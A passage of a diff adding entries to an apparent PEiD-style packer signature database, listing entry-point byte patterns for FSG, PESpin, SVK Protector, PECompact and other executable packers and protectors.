+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.31 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[NoodleCrypt v2.00 (Eng) -> NoodleSpa]
+signature = EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02 04 00 00 EB 01 9A E8 19 07 00 00 EB 01 9A E8 9C 00 00 00 EB 01 9A E8 9C 06 00 00 E8 00 00 00 00 0F 7E F8 EB 01 9A 8B F8 C3 E8 00 00 00 00 58 EB 01 9A 25 00 F0 FF FF 8B F8 EB 01 9A 0F 6E F8 C3 8B D0 EB 01 9A 81 C2 C8 00 00 00 EB 01 9A B9 00 17 00 00 EB 01 9A C0 0A 06 EB 01 9A 80 2A 15 EB 01 9A 42 E2 EE 0F 6E C0 EB 01 9A 0F 7E C0 EB 01 9A 8B D0 00 85 EB A5 F5 65 4B 45 45 00 85 EB B3 65 07 45 45 00 85 EB 75 C7 C6 00 85 EB 65 CF 8A 00 85 EB D5 FD C0 00 85 EB 7F E5 05 05 05 00 85 EB 7F 61 06 45 45 00 85 EB 7F
+ep_only = true
+
+[PassLock 2000 v1.0 (Eng) -> Moonlight-Software]
+signature = 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24 2C 01 00 00 00 74 05 0F B7 44 24 30 83 C4 44 89 43 56 FF 15 D0 61 40 00 E8 9E 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 6A 00 FF 15 E4 61 40 00 89 43 5C E8 F9 00 00 00 E8 AA 00 00 00 B8 FF 00 00 00 72 0D 53 E8 96 00 00 00 5B FF 4B 10 FF 4B 18 5F 5E 5B 5D 50 FF 15 C8 61 40 00 C3 83 7D 0C 01 75 3F E8 81 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 FF 15 D0 61 40 00 E8 3A 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 8B 45 08 89 43 5C E8 9A 00 00 00 E8 4B 00 00 00 72 11 66 FF 43 5A 8B 45 0C 89 43 60 53
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00
+ep_only = true
+
+[PeX v0.99 (Eng) -> bart/CrackPl]
+signature = E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 50 65 58 20 28 63 29 20 62 79 20 62 61 72 74 5E 43 72 61 63 6B 50 6C 20 62 65 74 61 20 72 65 6C 65 61 73 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 60 E8 01 00 00
+ep_only = true
+
+[Special EXE Pasword Protector v1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00 04 00 00 52 6A 00 51 50 FF 95 08 7A 00 00 5D 8D B5 3F 78 00 00 6A 00 6A 00 6A 00 56 FF 95 0C 7A 00 00 0B C0 0F 84 FE 00 00 00 56 FF 95 10 7A 00 00 56 FF 95 14 7A 00 00 80 BD 3E 78 00 00 00 74 D4 33 D2 8B BD 3E 77 00 00 8D 85 1D 02 00 00 89 85 42 77 00 00 8D 85 49 02 00 00 89 85 46 77 00 00 8D 85 EB 75 00 00 89 85 4A 77 00 00 8B 84 D5 24 76 00 00 03 F8 8B 8C D5 28 76 00 00 3B 85 36 77 00 00 60 74 1F 8D B5 BD 02 00 00 FF D6 85 D2 75 11 60 87 FE 8D BD 15 78 00 00 B9 08 00 00 00 F3 A5 61 EB 15 8D 85 9F 02 00
+ep_only = true
+
+[SVK Protector v1.32 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[SVK Protector v1.3x (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Video-Lan-Client -> (UnknownCompiler)]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE EB 02 CD 20 57 EB 02 CD 20 5A 88 10 EB 02 CD 20 40 E8 02 00 00 00 C5 62 5A 4E E8 01 00 00 00 43 5A 2B DB 3B F3 75 B1 C1 F3 0D 92 B8 DC 0C 4E 0D B7 F7 0A 39 F4 B5 ?? ?? 36 FF 45 D9 FA FB FE FD FE CD 6B FE 82 0D 28 F3 B6 A6 A0 71 1F BA 92 9C EE DA FE 0D 47 DB 09 AE DF E3 F6 50 E4 12 9E C8 EC FB 4D EA 77 C9 03 75 E0 D2 D6 E5 E2 8B 41 B6 41 FA 70 B0 A0 AB F9 B5 C0 BF ED 78 25 CB 96 E5 A8 A7 AA A0 DC 5F 73 9D 14 F0 B5 6A 87 B7 3B E5 6D 77 B2 45 8C B9 96 95 A0 DC A2 1E 9C 9B 11 93 08 83 9B F8 9E 0A 8E 10 F7 85
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB 02 F0 49 C1 F6 09 88 0B F7 DE 0F B6 F2 43 EB 02 CD 20 C1 E7 0A 48 EB 01 89 C1 E7 14 2B FF 3B C7 75 A8 E8 01 00 00 00 81 5F F7 D7 D9 EE 1F 5E 1E DD 1E 2E 5E 1E DC ?? ?? 5E 1E 71 06 28 1E 1E 1E 20 F0 93 23 A8 34 64 30 F0 E1 D0 9E 51 F9 C2 D1 20 1D 32 42 91 16 51 E7 1D 32 42 91 36 51 DE 1D 32 42 91 3F D1 20 5F CE 2E 1D 32 42 30 DE 91 17 93 5D C8 09 FA 06 61 1E 1E 1E 49 E9 93 2E 06 56 1E 1E 1E 09 46 CA EF 06 92 5F 31 E7 09 3A AF 66 DF FE 26 CA 06 40 1E 1E 1E 5B 1E 9B 1E 1E 91 28 9E 1A 23 91 24 A1 16 9D 95 20
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 EB 02 82 53 EB 02 CD 20 87 FA 88 10 80 F3 CA EB 02 CD 20 40 03 D7 0B D0 4E 1B D2 EB 02 CD 20 2B D2 3B F2 75 AC F7 DA 80 C3 AF 91 1C 31 62 A1 61 20 61 71 A1 61 1F ?? ?? ?? 61 B4 49 6B 61 61 61 63 33 D6 66 EB 77 A7 73 33 24 13 E1 94 3C 05 14 63 60 75 85 D4 59 94 2A 60 75 85 D4 79 94 21 60 75 85 D4 82 14 63 A2 11 71 60 75 85 73 21 D4 5A D6 A0 0B 4C 3D 49 A4 61 61 61 8C 2C D6 71 49 99 61 61 61 4C 89 0D 32 49 D5 A2 74 2A 4C 7D F2 A9 22 41 69 0D 49 83 61 61 61 9E 61 DE 61 61 D4 6B E1 5D 66 D4 67 E4 59 E0 D8 63
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 D6 83 C7 32 F7 DA 03 FE EB 02 CD 20 87 FA 88 10 EB 02 CD 20 40 E8 02 00 00 00 F1 F8 5B 4E 2B D2 85 F6 75 AF EB 02 DE 09 EB 01 EF 34 4A 7C BC 7D 3D 7F 90 C1 82 41 ?? ?? ?? 87 DB 71 94 8B 8C 8D 90 61 05 96 1C A9 DA A7 68 5A 4A 19 CD 76 40 50 A0 9E B4 C5 15 9B D7 6E A5 BB CC 1C C2 DE 6C AC C2 D3 23 D2 65 B5 F5 65 C6 B6 CC DD CC 7B 2F B6 33 FE 6A AC 9E AB 07 C5 C6 C7 F3 94 3F DB B4 05 CE CF D0 BC FA 7F A5 BD 4A 18 EB A2 C5 F7 6D 25 9F BF E8 8D CA 05 E4 E5 E6 24 E8 66 EA EB 5F F7 6E EB F5 64 F8 76 EC 74 6D F9
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++)]
+signature = 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA 33 0F B6 C9 0F BE 0E 88 16 EB 01 5F EB 01 6B 46 EB 01 6D 0F BE C0 4B EB 02 CD 20 0F BE C9 2B C9 3B D9 75 B0 EB 01 99 C1 C1 05 91 9D B2 E3 22 E2 A1 E2 F2 22 E2 A0 ?? ?? ?? E2 35 CA EC E2 E2 E2 E4 B4 57 E7 6C F8 28 F4 B4 A5 94 62 15 BD 86 95 E4 E1 F6 06 55 DA 15 AB E1 F6 06 55 FA 15 A2 E1 F6 06 55 03 95 E4 23 92 F2 E1 F6 06 F4 A2 55 DB 57 21 8C CD BE CA 25 E2 E2 E2 0D AD 57 F2 CA 1A E2 E2 E2 CD 0A 8E B3 CA 56 23 F5 AB CD FE 73 2A A3 C2 EA 8E CA 04 E2 E2 E2 1F E2 5F E2 E2 55 EC 62 DE E7 55 E8 65 DA 61 59 E4
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland C++)]
+signature = C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 EB 02 56 7B 2A D3 E8 01 00 00 00 ED 58 88 16 13 C3 46 EB 02 CD 20 4B EB 02 CD 20 2B C9 3B D9 75 A1 E8 02 00 00 00 D7 6B 58 EB 00 9E 96 6A 28 67 AB 69 54 03 3E 7F ?? ?? ?? 31 0D 63 44 35 38 37 18 87 9F 10 8C 37 C6 41 80 4C 5E 8B DB 60 4C 3A 28 08 30 BF 93 05 D1 58 13 2D B8 86 AE C8 58 16 A6 95 C5 94 03 33 6F FF 92 20 98 87 9C E5 B9 20 B5 68 DE 16 4A 15 C1 7F 72 71 65 3E A9 85 20 AF 5A 59 54 26 66 E9 3F 27 DE 8E 7D 34 53 61 F7 AF 09 29 5C F7 36 83 60 5F 52 92 5C D0 56 55 C9 61 7A FD EF 7E E8 70 F8 6E 7B EF
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 EA 0F E8 01 00 00 00 64 59 02 D3 EB 02 D6 5C 88 16 EB 02 CD 20 46 E8 02 00 00 00 6B B5 59 4B 0F B7 C6 0B DB 75 B1 EB 02 50 AA 91 44 5C 90 D2 95 57 9B AE E1 A4 65 ?? ?? ?? B3 09 A1 C6 BF C2 C5 CA 9D 43 D6 5E ED 20 EF B2 A6 98 69 1F CA 96 A8 FA FA 12 25 77 FF 3D D6 0F 27 3A 8C 34 52 E2 24 3C 4F A1 52 E7 39 7B ED 50 42 5A 6D 5E 0F C5 4E CD 9A 08 4C 40 4F AD 6D 70 73 A1 44 F1 8F 6A BD 88 8B 8E 7C BC 43 6B 85 14 E4 B9 72 97 CB 43 FD 79 9B C6 6D AC E9 CA CD D0 10 D6 56 DC DF 55 EF 68 E7 F3 64 FA 7A F2 7C 77 05
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F
+ep_only = true
+
+[PECompact 2.0beta/student version ->Jeremy Collake]
+signature=B8 ?? ?? ?? EE 05 12 13 13 12 50 64 FF 35 00 00 00 00 64 89 25 00
+ep_only = true
+
+[EXE Shield v0.5-v0.6 -> Smoke]
